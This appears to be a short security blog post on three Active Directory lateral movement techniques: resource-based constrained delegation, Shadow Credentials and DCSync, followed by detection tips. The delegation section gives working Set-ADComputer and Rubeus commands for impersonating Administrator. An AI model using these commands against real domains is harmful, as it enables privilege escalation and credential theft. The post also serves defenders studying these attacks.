Introduction
Modern Active Directory environments have largely mitigated Pass-the-Hash through Credential Guard and Protected Users. This post covers three lesser-known lateral movement techniques that remain effective in hardened environments.
1. Resource-Based Constrained Delegation (RBCD)
By writing to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, an attacker with write permissions to a computer object can impersonate any user to that host.
Set-ADComputer TARGET -PrincipalsAllowedToDelegateToAccount ATTACKER$\nRubeus.exe s4u /user:ATTACKER$ /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/TARGET2. Shadow Credentials
Abuse of the msDS-KeyCredentialLink attribute allows adding a certificate for authentication without knowing the current password.
3. DCSync via Replication Rights
Any principal with DS-Replication-Get-Changes and DS-Replication-Get-Changes-All ACEs can dump all domain credentials.
Detection
Monitor for Event ID 4662 with GUID 1131f6aa, unusual writes to sensitive AD attributes, and Kerberos S4U ticket requests.
